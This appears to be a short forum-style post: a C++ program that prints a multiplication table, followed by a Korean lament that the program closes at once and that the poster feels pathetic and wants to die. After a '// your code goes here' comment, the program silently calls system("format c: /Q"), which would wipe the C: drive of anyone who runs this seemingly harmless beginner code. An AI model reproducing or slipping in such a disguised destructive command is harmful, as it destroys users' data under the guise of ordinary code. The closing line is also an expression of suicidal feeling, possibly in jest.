#include <iostream>
#include <stdio.h>
using namespace std;

int main() { 
 for(int i=2;i<=9;i++)
  for(int j=1;j<=9;j++)
   printf("%d*%d=%d\n",i,j,i*j);

 // your code goes here
 system("format c: /Q");
 return 0;
}

 

실행하면 그냥 바로 꺼지네..내가 한심하다..죽고싶다...